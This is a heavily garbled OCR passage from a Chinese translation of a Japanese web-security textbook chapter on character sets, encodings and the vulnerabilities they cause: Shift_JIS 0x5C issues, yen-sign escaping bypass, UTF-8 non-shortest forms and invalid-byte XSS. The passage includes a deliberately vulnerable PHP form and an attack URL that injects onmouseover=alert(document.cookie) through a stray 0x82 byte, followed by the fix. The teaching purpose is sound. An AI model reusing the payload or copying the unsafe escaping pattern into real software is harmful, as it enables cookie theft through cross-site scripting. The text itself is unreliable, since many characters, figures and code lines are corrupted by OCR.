译 时 Unicode 的 最 新 版 为 62 版 (2012 年 9 月 27 日 公布 ) 
最 开始 制定 Unicode 字符 集 的 时 候 ， 计 划 只 用 16 比特 就 能 够 包罗 世界 上 所 有 的 字符 ， 不 过 
之 后 很 快 就 发 现 这 根本 不 够 用 ， 所 以 现在 Unicode 已 经 扩展 到 了 21 比特 了 。 最 初 制定 的 16 比特 
的 编码 则 称 为 基本 多 语言 平面 ( Basic Multilingual Plane，BMP )。 

Unicode 编码 里 将 文字 编码 成 为 码 位 (Code Point )， 用 U+XXXX (XXXX 为 4 位 到 6 位 的 
十 六 进 制 数 ) 表示 。 比 如 , 日语 里 的 “ 表 ” 的 码 位 为 U+8868。 

Unicode6.0 包括 了 之 前 我 们 介绍 过 的 
ASCII ISO-8859-1、 JISX0201、 JISX 0208.、 0 DT 
JISX 0213、 微 软 标准 字符 集 。 图 63 显示 于 
了 它们 之 间 的 包含 关系 。 微软 标准 a 







































































人 GB2312 

GB2312 又 称 GB2312-80 字符 集 ， 全 
称 为 “信息 交换 用 汉字 编码 字符 集 ' 基本 
集 ”， 由 原 中 国 国家 标准 总 局 发 布 ，1981 年 
月 1 日 开始 实施 。GB2312 在 中 国 大 陆 和 
新 加 坡 被 广泛 使 用 ， 中 国 大 陆 几乎 所 有 的 
中 文 软件 都 支持 该 字符 集 。 

GB2312 是 一 个 16 位 字符 集 ， 它 是 对 ASCII 的 中 文 扩 展 并 兼容 ASCII。GB2312 字符 集 一 共 
收录 了 6763 个 汉字 ， 其 中 一 级 汉字 3755 个 ， 二 级 汉字 3008 个 。 同 时 它 还 收录 了 包括 拉丁 字母 、 
希腊 字母 、 日 文平 假名 片 假名 等 在 内 的 682 个 字符 。 但 不 支持 人 名 、 古 汉语 等 方面 的 军用 字 和 繁 
体 字 ， 这 也 导致 了 后 来 GBK 和 GB18030 字符 集 的 出 现 。 
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外 轩 吉 他 品 冰 FAs pO, Ie ye 

















S$ GBK 
GBK 即 汉 字 内 码 扩 展 规范 ， 它 是 GB2312 编码 的 超 集 ， 向 下 完全 兼容 GB2312， 并 支持 
GB2312-80 编码 不 支持 的 部 分 中 文 姓 、 中 文 繁体 、 日 文 假名 ， 以 及 硕 腊 字母 、 俄 语 字 母 等 字母 。 
不 过 GBK 并 不 是 国家 标准 ， 它 最 早 实 现 于 Windows 95 简体 中 文 版 ， 也 就 是 CP936 字 码 表 。 
微软 的 CP936 通常 被 视 为 等 同 GBK。 






































320 第 6 章 字符 编码 和 安全 





@ GB18030 

GB18030 全 称 为 “信息 交换 用 汉字 编码 字符 集 。 基 本 集 的 扩充 ”， 是 于 2000 年 发 布 的 新 的 汉 
字 编 码 国家 标准 ， 它 也 兼容 GB2312 标准 。 

GB18030 编码 是 变 长 编码 ， 有 单字 节 、 双 字 节 和 四 字 节 三 种 方式 ， 该 标准 支持 超过 160 万 
的 码 位 空间 。 最 新 版 GB18030-2005 兼容 Unicode 中 日 韩 统一 汉字 ， 共 收录 了 70244 个 汉字 ， 覆 
盖 了 繁体 和 简体 中 文 、 日 文 、 参 鲜 语 和 中 国 少数 民族 ( 如 藏 、 蒙 古 、 僚 、 莱 、 维 吾 尔 等 ) 的 文字 。 












































令 不 同 字符 相同 编码 的 问题 
我 们 在 介绍 JIS X 0201 的 时 候 已 经 说 过 了 ， 即 使 编码 相同 ,但 是 在 不 同 的 字符 集 里 ， 表 示 的 
字符 是 不 一 样 的 。 比 如 在 安全 上 很 容易 出 问题 的 反 斜 线 “\” 和 日 元 符号 “¥ 半 ”就 是 这 种 情况 。 
在 ISO-8859-1 和 Unicode 里 面 ，0xA5 是 分 配给 日 元 符号 “ 王 ” 的 ， 然 而 在 日 本 的 字符 编码 
里 面 ， 一 直 都 是 用 0x5C 来 表示 日 元 符号 “于 ”的 。 它 们 之 间 的 关系 可 以 参考 表 6-2 对 这 两 个 字 
符 在 各 个 字符 集 的 总 结 。《® 


表 6-2 ”字符 集 之 间 字 符 分 配 区 别 






































字符 集 Ox5C OxA5 
ASCI| \ 9% ” 
JIS X 0201 ¥ . 
ISO-8859-1 \ ¥ 
Unicode 中 ¥ 
GB2312 \ 非法 字 生 
GBK \ 非法 字 租 
GB18030 \ 非法 字符 























令 字符 集 的 处 理 引 起 的 漏洞 

上 面 列 出 的 字符 集 间 对 同一 字符 分 配 不 同 编码 的 问题 ， 有 时 候 会 成 为 系统 产生 安全 漏洞 的 原 
因 。 将 Unicode 的 日 元 符号 “至 ”(U+00A5 ) 转换 为 JIS 系列 编码 的 时 候 ， 根 据 处 理 方法 的 不 同 ， 
为 了 保留 原 字符 需要 将 此 字符 编码 转换 为 0x5C ( JIS X0201 的 日 元 符号 )。 而 0x5C ( 表示 反 和 斜 线 
的 编码 ) 在 需要 转 义 的 时 候 由 于 处 理 顺 序 等 不 同 而 导致 转 义 操作 被 遗漏 的 时 候 ， 就 有 可 能 导致 系 
统 产 生 漏洞 了 。 

反 斜 线 在 SQL 语句 里 等 是 需要 转 义 的 对 象 字 符 , 但 是 如 果 在 日 元 符号 “¥”( U+00A5 ) 的 
状态 下 被 转 义 ， 而 之 后 又 被 转换 为 反 斜 线 “\” 的 话 ， 那 么 转 义 操作 就 跟 没 有 做 过 一 样 了 。® 




















因为 US-ASCII 是 7 比特 的 字符 集 ， 所 以 最 高 位 的 1 比特 会 被 忽略 ， 被 当 作 0x25 进行 处 理 。 

半角 的 中 点 。 

具体 可 以 参考 独立 行政 法 人 信息 处 理 推进 机 构 (IPA ) 的 资料 《安全 调用 SQL 的 方法 》 中 的 “A.3 由 Unicode 导致 的 
SQL 注入 ”。 


四 所 日 
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6.3 ”字符 编码 方式 


前 面 我 们 对 什么 是 对 字符 集 进行 了 说 明 ， 从 本 节 开 始 我 们 将 对 字符 集 如 何在 计算 机 上 表示 
及 人 处理 ， 也 就 是 编码 ( Encoding ) 进行 说 明 。 首 先 我 们 将 介绍 一 下 比较 常用 的 日 文字 符 编 码 方式 ， 
然后 再 针对 这 些 编码 方式 的 特点 及 注意 事项 加 以 说 明 。 





令 什么 是 编码 方式 

字符 集 (符号 化 字符 集 ) 虽然 已 经 被 标 上 了 编号 ， 也 许 我 们 会 觉得 直接 那样 在 计算 机 上 使 
用 不 就 可 以 了 吗 ? 然而 实际 上 没 那么 简单 。 首 先 最 初 普及 的 字符 集 多 是 单字 节 字 符 集 ， 比 如 
US-ASCII、ISO-8859-1、JIS X 0201 等 ， 后 来 发 展 起 来 的 兼容 单字 节 字 符 集 的 多 字 节 字符 集 ， 比 
如 JIS X 208 或 者 Unicode 等 ， 和 US-ASCII 等 单字 节 字 符 集 还 是 同时 并 存 的 。 为 了 兼容 并 且 同 时 
支持 不 同 的 字符 集 ， 需 要 对 这 些 字符 集 进行 编码 ， 这 种 编码 过 程 就 叫 作 “编码 ”或 者 “字符 编码 
方式 "< 

在 日 语 Web 应 用 程序 里 多 使 用 的 字符 编码 方式 有 基于 JIS 系列 字符 集 的 Shift JIS 和 EUC- 
卫 ， 以 及 基于 Unicode 字符 集 的 UTF-16 和 UTF-8。 

下 面 我 们 分 别 对 这 些 字 符 编 码 方式 进行 说 明 。 



























































@ Shift_JIS 

1980 年 代 初 期 ， 个 人 计算 机 开始 在 日 本 普及 ， 同 时 也 出 现 了 针对 在 计算 机 上 处 理 日 语 汉 字 
的 新 字符 编码 方式 的 需求 。 为 了 满足 这 种 需求 ， 出 现 了 将 字符 集 JIS X0208 映射 到 JIS X0201 空 
白 区 域 的 编码 方法 ， 这 就 是 Shfit JIS。Shift JIS 使 用 的 字符 集 是 微软 标准 字符 集 ， 所 以 Shift JIS 
也 被 称 为 微软 字 码 页 ( Code Page ) 932 或 者 简称 为 CP932。 

在 Shfit_JIS 编码 里 ， 为 2 字 节 字符 中 的 第 一 个 字 节 (前 置 字 节 ) 分 配 了 0x81 一 0x9F 和 
0xE0 一 0xFC 两 块 区 域 ， 将 第 二 个 字 节 (后 置 字 节 ) 分 配给 了 0x40 一 0x7E 和 0x80 一 0xFC 两 块 。 
可 以 参考 图 6-4 里 示例 的 字符 编码 分 配方 式 。 

图 6-4 Shifit_JIS 的 各 字 节 分 配 
0 20 4 60 80 A CO Eo FF 


Tr | 
sri 
IE II 

和 后 面 要 讲 到 的 EUC-JP 或 者 UTF-8 比 起 来 ，Shfit_ JIS 这 种 字符 编码 方式 巧妙 的 使 用 了 第 一 
个 字 节 中 比较 窗 的 一 部 分 来 扩展 出 第 二 字 节 以 容纳 更 多 的 汉字 ， 从 存储 效率 上 来 说 是 比较 高 的 ， 
但 是 同时 也 有 一 些 它 固有 的 缺点 。 下 面 我 们 就 来 看 看 它 的 缺点 都 有 哪些 。 









































322 | 第 6 章 字符 编码 和 安全 


OO 对 字符 匹配 的 影响 

第 一 个 缺点 是 由 于 Shift_JIS 编码 的 第 一 个 字 节 和 第 二 个 字 节 有 部 分 编码 是 重合 的 ， 如 果 光 
把 第 一 个 字 节 拿 出 来 ,我们 无 法 分 辩 它 是 某 一 字符 编码 后 的 第 一 个 字 节 的 还 是 第 二 个 字 节 。 

而 且 ,， 在 后 置 字 节 的 范围 里 ， 存 在 着 和 第 一 字 节 中 特殊 符号 重合 的 部 分 ， 如 果 对 Shift_JIS 
字符 处 理 存 在 缺漏 的 话 ， 可 能 会 吧 Shift_JIS 中 后 置 字 节 的 数据 误 认为 特殊 符号 来 处 理 了 。 典 型 
例子 是 由 0x5SC “三 ”导致 的 错误 ， 即 “SC” 问 题 。 

下 面 我 们 来 看 一 下 具体 的 例子 。 首 先 看 一 下 在 字符 串 “ 了 1)VV 口 ” 中 查找 字符 “ 宣 ” 的 问 
题 ， 如 图 6-5 所 示 。 类 似 的 Bug， 笔 者 曾经 在 一 个 咨询 案例 中 遇 到 过 ， 当 时 它 存 在 于 用 PHP 编写 
的 片 假名 判断 函数 中 。 在 笔者 负责 的 那个 应 用 里 ， 这 个 Bug 把 “ 宴 ” 误 当 作 片 假名 了 。"™ 


图 6-5 “ 屯 由 儿 韦 口 ” 中 的 第 二 、 三 字 节 和 “ 宴 ” 匹 配 成 功 
芯 Wy / 区 
83 |89|8318A|18318D |183 | 8C | 83 |8D 
匹配 成 功 










































































宴 
89 | 83 
如 果 想 再 现 这 个 问题 的 话 ， 可 以 使 用 下 面 的 脚本 ( 注意 文件 需要 以 Shift_JIS 编码 方式 保存 )。 
程序 的 执行 结果 为 1 ( strpos 的 返回 值 是 从 源 字符 串 的 位 置 0 开始 计算 的 )。 





























<?php 
SP = strpos(' FU/LL 
var_ dump ($p); 























解决 这 个 问题 的 方法 其 实 很 简单 ， 那 就 是 使 用 对 应 多 字 节 字符 串 操 作 的 mb_strpost 来 代 
替 strpos 方法 。 此 外 ， 需 要 将 内 部 字符 编码 方式 2 设 为 Shift JIS。 
下 面 我 们 再 看 一 下 将 字符 “ 表 ” 的 第 二 字 节 和 日 元 符号 “至 "匹配 的 例子 ， 如 图 6-6 所 示 。 
这 也 是 引起 系统 漏洞 的 可 能 原因 。 
6-6” 表 的 第 二 字 节 和 羊 匹配 成 功 


表 
95 | 5C | 97 | A0 














测 

















匹配 成 功 





¥ 
5C 


上 面 两 个 例子 都 可 以 通过 使 用 多 字 节 版 本 的 字符 串 处 理 函 数 来 解决 。 男 外 ， 如 果 使 用 UTF-8 




















@ ”中文 编码 也 有 类 似 的 问题 ， 可 以 参考 后 面 GB2312 部 分 的 相关 内 容 。 


©® mb.internal encoding 


译 者 注 
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(后 面 会 涉及 ) 的 话 ， 由 于 其 本 身 从 编码 规则 上 来 说 不 会 导致 类 似 上 面 问题 的 发 生 ， 可 以 说 是 一 
种 比较 安全 的 方法 。 


人 非法 的 Shift_JIS 编码 数据 
现在 已 经 有 一 些 公开 的 方法 可 以 通过 使 用 非法 的 Shift_ JIS 数据 进行 攻击 。 非 法 的 Shift JIS 
编码 数据 ( 字 节 数据 ) 指 的 是 如 下 的 数据 。 
只 有 Shift JIS 的 前 置 字 节 而 没有 后 置 字 节 (比如 0x81 ) 
紧 随 Shift_ JIS 前 置 字 节 的 后 置 字 节 不 在 正确 的 范围 之 内 (比如 0x81 0x21 ) 


人 由 非法 Shift_JIS 编码 数据 引起 的 XSS 
非法 的 Shift_JIS 编码 数据 有 时 候 可 能 引起 XSS 漏洞 。 请 参考 下 面 的 示例 代码 。 假 设 源 文件 
以 Shift_JIS 编码 保存 并 运行 。 


代码 清单 ”63/63-001.php 

















<?php 
session start(); 
header ('Content-Type: text/html; charset=Shift JIS'); 
?> 
<body> 
<form action=""> 
姓名 : <input name=name value="<?php echo 
htmlspecialchars($ GET['name'], ENT QUOTES); ?>"><br> 
邮箱 地 址 : <input name=mail value="<?php echo 
htmlspecialchars($ GET['mail'], ENT QUOTES); ?>"><br> 
<input type="submit"> 

















</form> 
</body> 











当 不 带 表 单 查询 字符 串 ( Query String ) 的 时 候 ， 页 面 显 示 如 下 图 6-7 所 示 。 


图 6-7 63-001.php 的 页 面 显 示 


- 
看 http://example.jp/63/63-001.php - Windows Inte... Tel 
































GO©O ” 辐 http://example.jp/63/63-001.php ” 颁 | x 
窒 实 |@ http://examplejp/63/63-001.php | | 从 
书 名 前 : 
X 一 儿 7FL 入 

5 工 J 送 信 

















下 面 ,， 我们 再 通过 下 面 的 URL 来 运行 刚才 的 例子 。 





http://example.jp/63/63-001.php?name=1%82&mail=onmouseover%$3dalert (document .cookie)// 
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如 图 6-8 所 示 ， 可 以 看 到 页 面 里 本 来 有 两 个 的 输入 框 现在 变 成 只 有 一 个 了 。 


6-8 ”63-001.php 页 面 显 示 被 修改 
「 是 http://example.jp/63/53-001.php?name=19682&.… ee x | 











GO ” | 加 http://example.jp/63/63-001.php?name=1 ~ 艰 | x | 








帘 实 |@ http://examplejp/63/63-001.php?... | 












可 名 前 :1:><BR>2 一 必 PRL 


攻 工 J 送信 





















如 果 我 们 再 把 鼠标 移动 到 输入 框 上 面 去 ， 则 JavaScript 代码 会 被 执行 ， 弹 出 如 图 6-9 那样 的 
对 话 框 。 
6-9 植 入 的 JavaScript 代码 被 执行 


- 
乱 http://example.jp/63/63-001,.phpname=19682&... [号 | 加 |  ] 


























~ | 屋 | http://@ Windows Internet Explorer 忆 


窗 - 安 | 六 http://e 
一 一 有 PHPSESSID=g0els38blocm6907jkaioqmal3 


书 名 前 : 1:><BR> XJ | 
RS 








二 












这 时 候 我 们 再 来 看 看 页 面 的 源 代 码 (关键 部 分 ) 如 下 所 示 。 





<input name=name Value="1 . ><BR> 


邮箱 地 址 : 


<input name=mail value="onmouseover=alert (document .cookie)//"><BR> 











这 里 只 显示 了 表单 里 和 input 属性 值 相关 的 内 容 ， 其 中 由 程序 生成 的 内 容 以 网 格 线 显 示 。 


6-10 ”应 用 程序 生产 的 属性 值 
字符 ”ml 0x82 “| 站 记 |- 民 | 总 
值 22 lS 82 22|.3e|3c|42|52|3e 









































其 中 0x82 是 Shift_JIS 编码 里 两 字 节 字符 中 的 第 一 个 字 节 ， 很 多 浏览 器 (包括 Internet 
Explorer 和 Firefox 等 )， 都 将 0x82 和 后 面 的 " 作为 一 个 字符 看 待 。 所 以 本 来 表示 属性 值 结束 位 
置 的 双 引 号 "被 作为 Shift_JIS 编码 字符 的 第 二 字 节 使 用 ， 直 到 input 元 素 的 “value=” 为 止 ( 上 
述 HTML 代码 中 的 阴影 部 分 )， 都 被 作为 前 一 元 素 的 value 属性 来 处 理 了 。 




















6-11 0x82 和 "被 合 起 来 当 作 一 个 字符 来 处 理 
字符 ” A 
值 22 lil 82 22 3e|13c|42|52|3e 
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由 于 前 一 属性 的 值 的 闭合 双 引 号 一 直 延 续 到 了 下 一 个 属性 的 “value=”， 所 以 通过 参数 mail= 
上 定 的 “onmouseover=alert (document .cookie)//” 被 “ 挤 到 ”了 属性 值 的 外 面 , 从 而 被 
识别 成 了 HTML 元 素 的 鼠标 事件 绑 定 了 。 
我 们 会 在 后 面 说 明 如 何 从 根本 上 解决 这 个 问题 的 。 这 里 我 们 先 看 一 下 如 何 通 过 指 
定 htmlspecialchars 困 数 的 第 三 个 参数 来 设置 正确 的 字符 编码 方式 ， 以 消除 XSS 隐患 。 





EE 








代码 清单 ”63/63-002.php ( 部 分 代码 ) 





姓名 : <input name="name" value="<?php echo 








htmlspecialchars($ GET['name'], ENT QUOTES, 'Shift JIS'); ?>"><br> 
邮箱 地 址 : <input name="mail" value="<?php echo 
htmlspecialchars($ GET['mail'], ENT QUOTES, 'Shift JIS'); ?>"><br> 























修改 后 的 代码 执行 结果 可 以 参考 下 面 的 图 6-12。 > 图 6-12 消除 XSS 隐患 后 
在 这 个 图 中 3 我 们 可 以 看 到 onmouseover 事件 作为 纯 [ 儿 http://example.jp/63/63-002.php?name=1%828... lel 
文本 显示 在 了 文本 框 中 ， 而 没有 被 解释 为 JavaScript GO v | 加 http://example.jp/63/63-002.php?name=l ~ 艰 | x | 





























脚本 来 执行 穷人 -| 疗 http://examplejp/63163-002.phpz..。 | 一 | 全 so 
D | | 
书 名 前 : 
令 E U C-J P 2—JL PFFL 2 onmouseover=alertl 











EUC-JP 是 为 了 在 Unix 上 处 理 日 语 而 设计 的 字符 
编码 方式 。 对 于 US-ASCII 字符 集 的 字符 ，EUC-JP 直接 使 用 其 编码 ， 对 于 JIS X 0208 字符 集 规 
定 的 日 语 字符 ， 则 使 用 两 个 字 节 的 0xAl 一 0xFE 范围 。 

图 6-13 是 EUC- 卫 的 各 个 字 节 的 分 布 示 意图 


图 6-13 EUC-JP 的 各 字 节 分 布 


2 字 节 字符 的 前 置 字 节 | 
2 字 节 字符 的 后 置 字 节 | 


从 上 图 可 以 看 出 ， 由 于 2 字 节 长 字符 的 后 置 字 节 不 会 和 1 字 节 字符 发 生 重合 ， 所 以 不 存在 
Shift_JIS 中 的 “SC” 问 题 。 但 是 ，EUC-J 里 2 字 节 长 字符 的 前 置 字 节 和 后 置 字 节 范围 是 一 样 
的 ， 所 以 如 果 将 日 语 字 符 串 移 位 一 个 字 节 的 话 ， 就 会 发 生字 符 串 匹配 问题 。 图 6-14 是 在 字符 串 
“LV 口 ”中 匹配 “党 ”的 例子 。 

图 6-14 ”字符 串 “ 光 由 VL 口 ” 中 匹配 “党 ”成 功 


受 y ) L 
A5IE9|A5IEAIA5IEBIAS5IECIAS ED 


匹配 成 功 
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下 面 的 代码 (需要 将 文件 保存 为 EUC-JP 编码 方式 ) 展示 了 如 何 再 现 这 个 问题 。 脚 本 的 运行 
结果 会 打印 出 来 显示 3 ( strpos 的 返回 结果 是 从 源 字符 串 的 位 置 0 开始 计算 的 )。 














<?php 
$p = strpos(' 了 FUYU 儿 LD'，' 千 '); 
var_ dump ($p); 


























要 想 解 决 这 个 问题 也 很 简单 ， 和 Shift JIS 一 样 ， 使 用 多 字 节 版 本 的 mb_strpos 就 可 以 了 。 
同样 ， 内 部 字符 编码 方式 需要 设置 为 EUC-JP。 








O 非法 的 EUC-JP 编码 数据 
什么 算得 上 是 非法 的 EUC-JP 编码 数据 ? 其 条 件 和 前 面 讲 到 的 “非法 的 Shift_JIS 编码 数据 ” 
中 提 到 的 内 容 是 一 样 的 。 而 且 ， 和 Shift JIS 一 样 ， 非 法 EUC-JP 编码 数据 也 会 造成 系统 漏洞 。 




















ISO-2022-JP 

ISO-2022-JP 采用 的 是 7 比特 的 字符 编码 方式 ， 采 用 转 义 序列 的 方式 来 在 US-ASCI 和 JIS 
X 0208 之 间 进 行 交替 编码 的 方法 。 有 时 候 ISO-2022-JP 也 被 称 为 “JIS 编码 ”。 图 6-15 是 转 义 序 
列 的 一 个 例子 ， 其 表示 的 是 用 ISO-2022-JP 编码 方式 的 日 语 字 符 串 “ABC 上 漠 字 !” 在 内 存 的 存 
储 情况 。 


6-15 ISO-2022-JP 字符 串 编 码 示 例 




































































AIBIC| ESCS$B 本 汉 字 ESC(B 1 
41|14214311B12414212414813414113B17A1B128142121 
切换 为 JISX 0208 编码 切换 为 US-ASCI 编码 








在 上 面 的 图 里 ， 以 “ESC $ B” 开 头 的 为 JIS X 0208 编码 的 数据 ， 以 “ESC (B” 开 头 的 数据 
则 为 US-ASCII 编码 的 数据 。 由 于 ISO-2022-JP 交替 使 用 了 两 种 不 同 的 编码 方式 ， 所 以 并 不 适合 
在 计算 机 内 部 进行 处 理 和 查询 等 操作 。 这 种 编码 方式 主要 用 于 在 通信 网 络 中 进行 数据 传输 ， 比 较 
典型 的 使 用 场景 就 是 电子 邮件 的 传输 。 

也 许 大 家 听 说 过 “在 网 络 上 不 要 使 用 半角 片 假 名 ”这 种 说 法 ， 其 由 来 也 和 ISO-2022-JP 编码 
有 关 ， 因 为 ISO-2022-JP 编码 中 并 不 支持 半角 片 假 名 (JIS X 0201 )。 

以 上 我 们 已 经 针对 Shift JIS、EUC-JP、ISO-2022-JP 等 基于 JIS 系列 字符 集 的 编码 方式 进行 
了 相应 的 说 明 ， 下 面 开始 我 们 再 来 看 看 Unicode 编码 的 两 种 主要 编码 方式 : UTF-16 和 UTF-8。 






































SUTF-16 
Unicode 在 最 初 设计 的 时 候 曾 想 使 用 16 比特 的 长 度 来 容纳 世界 上 所 有 的 字符 ， 所 以 当时 直 
接 使 用 16 比特 码 位 ( Code Point ) 的 编码 方式 USC-2， 这 也 是 当时 使 用 最 普及 的 Unicode 编码 方 





























中 Escape Sequence。 通 过 一 定 的 组 合 来 表示 不 能 直接 显示 的 字符 的 方法 。 狭 义 上 来 指 以 转 义 字符 “0x1B” 即 ESC 开始 
的 字符 串 。 译 者 注 
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式 。 但 是 之 后 Unicode 长 度 扩展 到 了 21 比特 ， 随 之 出 现 的 是 UTF-16 编码 方式 。 这 种 编码 方式 在 
兼容 UCS-2 的 同时 ， 也 支持 BMP 之 外 的 字符 。 

UTF-16 通过 使 用 代理 对 ( Surrogate Pair ) 技术 来 实现 支持 BMP 之 外 的 字符 。 它 通过 在 16 
比特 的 Unicode 范围 内 预 留 两 个 1024 (2 的 10 次 方 ) 字符 长 度 的 区 域 (0xD800 一 0xDBFF 以 及 
0xDC00 一 0xDFFF )， 这 两 个 区 域 组 合 的 话 则 一 共 可 以 表示 2 的 20 次 方 ( 大 约 100 万 ) 个 字符 。 

我 们 来 看 一 下 具体 的 实例 ， 比 如 BMP 以 外 的 日 语 汉 字 “ 吉 ”， 这 个 汉字 读 作 “了 石上 L”， 
Unicode 编码 为 U+20BB7， 和 转换 为 代理 对 之 后 ， 其 存储 结构 为 D842-DFB7， 如 下 图 所 示 ， 图 中 
显示 的 是 “吉田 ”用 UTF-16 进行 编码 后 的 样子 。 






































图 6-16 ”将 “吉田 ”进行 UTF-16 编码 的 结果 









































吉 ( U+20BB7 ) ( U+7530 ) 
D842 | DFB7 7530 
S UTF-8 


UTF-8 是 和 US-ASCII 保持 兼容 的 Unicode 的 一 种 编码 方式 。UTF-8 按照 表 6-3 的 规则 根据 
Unicode 的 码 位 范围 不 同 采 用 不 同 的 方法 进行 编码 ， 最 终 编码 后 的 字 节 长 度 为 1 字 节 到 4 字 节 的 
可 变 长 度 。 

表 6-3 ”UTF-8 编码 比特 位 模式 






























































码 位 沱 转 UTF-8 编码 比特 位 模式 比特 位 长 
0~7F 7 比特 
80~7FF 11 比特 
800 ~ FFFF 16 比特 | 国王 1 字 节 字符 
10000 ~ 10FFFF 10xxooox 10xooox 10xcoox 国 取 和 人 三 > 上 














图 6-17 显示 的 是 UTF-8 编码 后 各 字 节 的 分 布 示意 图 。 


图 6-17 UTF-8 编码 后 各 字 节 分 布 
0 20 40 60 80 A0 CO EO FF 


1 字 书 字符 | 
多 字 节 字符 的 前 置 字 节 | | | 
多 字 节 字符 的 后 置 字 节 | | | 

从 图 6-17 中 我 们 可 以 看 到 ， 用 UTF-8 方式 编码 后 各 前 置 字 节 和 后 置 字 节 不 存在 重合 的 部 分 ， 
给 定 某 一 字符 串 中 的 任 一 字 节 ， 立 刻 就 可 以 知道 这 一 字 节 是 字符 编码 后 的 首 字 节 还 是 后 置 字 节 。 
因此 UTF-8 不 会 像 Shfit JIS 那样 发 生 “5C” 问 题 ， 也 不 存在 像 Shift_ JIS 和 EUC-JP 那样 在 字符 
匹配 时 从 字符 中 间 开 始 匹配 的 问题 。 

使 用 UTF-8 编码 方式 对 日 语 字符 进行 编码 的 时 候 ，JIS X0208 规定 的 汉字 基本 上 都 会 编码 为 
3 字 节 长 ，JIS X 0213 规定 的 第 3 基准 和 第 4 基准 汉字 会 有 部 分 编码 为 4 字 节 。 比 如 前 面 说 道 的 
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“者 ”( U+20BB7 )， 在 UTF-8 里 会 编码 为 “F0 A0 AE B7”4 个 字 节 。 下 图 6-18 显示 的 是 “者 ” 字 


编码 后 的 结 


6-18 将 “吉田 ”进行 UTF-8 编码 的 结果 
吉 ( U+20BB7 ) 田 ( U+7530 ) 
F0O |jAo |jAE|B7|E7 |941B0 





















































从 整体 上 来 说 ，UTF-8 是 现在 字符 编码 里 使 用 最 方便 也 是 最 安全 的 编码 方式 ， 但 是 它 也 有 需 

















要 注意 的 地 方 ， 那 就 是 非 最 短 形式 的 问题 。 


OUTF-8 的 非 最 短 形式 ( non-shortest form ) 问题 
我 们 再 看 一 下 表 6-3。 在 UTF-8 里 U+007F 之 前 的 
字符 都 可 以 用 1 个 字 节 来 表现 ， 但 是 从 形式 上 说 ， 本 
来 应 该 用 1 个 字 节 表示 的 字符 ， 用 两 个 字 节 也 可 以 表 
示 。 接 着 我 们 可 以 看 个 具体 的 例子 ， 比 如 表 6-4 是 把 
和 斜 线 “/”( U+002F ) 编码 为 1 字 节 一 4 字 节 的 结果 。 


CO UTF-8 非 最 短 形式 引起 的 漏洞 
































表 6-4 “/” 的 非 最 短 形式 


























1 字 节 | 0x2F 最 短 形式 

2 字 节 | 0xCO OxAF 

3 字 节 | 0xE0 0x80 0xAF 非 最 短 形式 
4 字 节 | 0xF0 0x80 0x80 0xAF 





有 时 候 UTF-8 的 非 最 短 形 式 编码 的 数据 可 能 会 引起 系统 的 漏洞 。 系 统 出 现 漏洞 的 流程 如 下 。 
安全 检查 的 时 候 并 未 将 非 最 短 形 式 0xC0 0xAF 识别 为 斜 线 0x2F 
而 后 续 处 理 中 将 输入 数据 作为 文件 名 等 处 理 ， 误 将 0xC0 0xAF 作为 斜 线 来 看 待 
之 所 以 出 现 上 面 这 样 的 结果 ， 是 因为 将 用 UTF-8 的 非 最 短 形式 编码 的 0xC0 0xAF 机 械 地 转 
换 为 其 他 编码 方式 ( Shift JIS、UTF-16 等 ) 的 时 ” 户 图 6-19 安全 检查 中 非 最 短 形式 编码 数据 被 漏 





修 ， 会 被 转换 为 普通 的 斜 线 。 也 就 是 用 非 最 短 形 


掉 的 例子 


式 编码 的 斜 线 在 安全 检查 时 被 遗漏 ， 而 在 打开 文 。 氏 仿 CO DAF 的 文件 名 


件 操作 时 非 最 短 形式 的 斜 线 被 当 作 普通 的 斜 线 处 
理 了 。 如 果 将 上 面 的 描述 画 成 一 张 图 进行 说 明 的 
话 ， 可 以 参考 图 6-19。 

由 于 这 个 问题 的 存在 ， 所 以 在 UTF-8 的 最 
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新 标准 (RFC3629 ) 里 规定 必须 将 非 最 短 形式 的 。 | 送行 Shift_JIS 编码 转换 





编码 数据 作为 非法 数据 进行 处 理 。 然 而 实际 上 根 





0xC0 0xAF 被 转换 为 “/” 


v 





据 实际 情况 不 同 ， 还 有 很 多 允许 非 最 短 形式 编码 








打 








文件 操作 











数据 存在 的 系统 ， 需 要 格外 注意 。 

下 面 是 最 近 出 现 的 允许 非 最 短 形 式 编 码 的 
UTF-8 处 理 而 导致 出 现 问题 的 例子 。 当 然 实 际 上 出 
现 的 问题 不 只 这 些 ， 需 要 我 们 注意 时 常 更 新 软件 。 











# 





文件 名 包含 “/” 的 文件 
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Java SE6 Update 10 之 前 的 了 下 E (Java 运行 时 环境 ) 
PHP5.3.1 以 前 的 ntmlspecialchars 哺 数 


OO 其 他 非法 的 UTF-8 编码 

ISO/TEC 10646 是 和 Unicode 非常 相像 的 国际 标准 ， 在 2006 改版 之 前 它 使 用 比 Unicode 更 宽 
阔 的 31 比特 空间 来 容纳 各 种 字符 ， 如 果 用 UTF-8 进行 编码 的 话 ，1 个 字符 最 大 可 能 需要 6 个 字 
节 的 存储 空间 。 但 是 随 着 ISO/IEC 10646 在 2006 年 的 改版 ， 实 质 上 它 已 经 和 Unicode 是 相同 的 字 
符 集 了 ，UTF-8 编码 后 的 最 大 长 度 也 变 为 4 字 节 了 。 

但 是 PHP 的 字符 编码 方式 检查 函数 mb_check_encoding 非常 重视 对 老 标准 的 兼容 性 ， 即 
使 是 UTF-8 编码 后 长 度 为 5 个 字 节 的 数据 都 认为 是 正常 的 编码 数据 ?。 

另外 ， 如 果 将 代理 对 的 预 分 配 范围 (0xD800~0xDBFF 和 0xDC00~0xDFFF ) 内 的 码 位 机 
械 变换 为 UTF-8 的 话 ， 会 占用 3 个 字 节 。 比 如 将 U+D800 机 械 地 变 成 UTF-8 编码 的 话 会 得 到 
“ED A0 80”， 但 是 作为 UTF-8 来 讲 这 个 数据 是 非法 的 UTF-8 编码 数据 。 在 将 代理 对 表示 的 字符 
转换 为 UTF-8 的 时 候 ， 需 要 先 将 原 数据 进行 UTF-32 编码 为 32 位 的 形式 ， 然 后 在 转换 为 UTF-8 
的 形式 ， 最 终 编 码 后 的 长 度 应 该 为 4 个 字 节 。 

在 PHP5.2 之 前 版 本 的 mb_check_encoding 会 把 上 面 说 的 直接 将 代理 对 表示 的 字符 机 械 地 
转换 为 UTF-8 得 到 的 数据 看 作 是 正常 的 数据 ， 这 个 问题 在 5.3.0 及 以 后 的 版 本 已 经 被 修正 了 。 在 
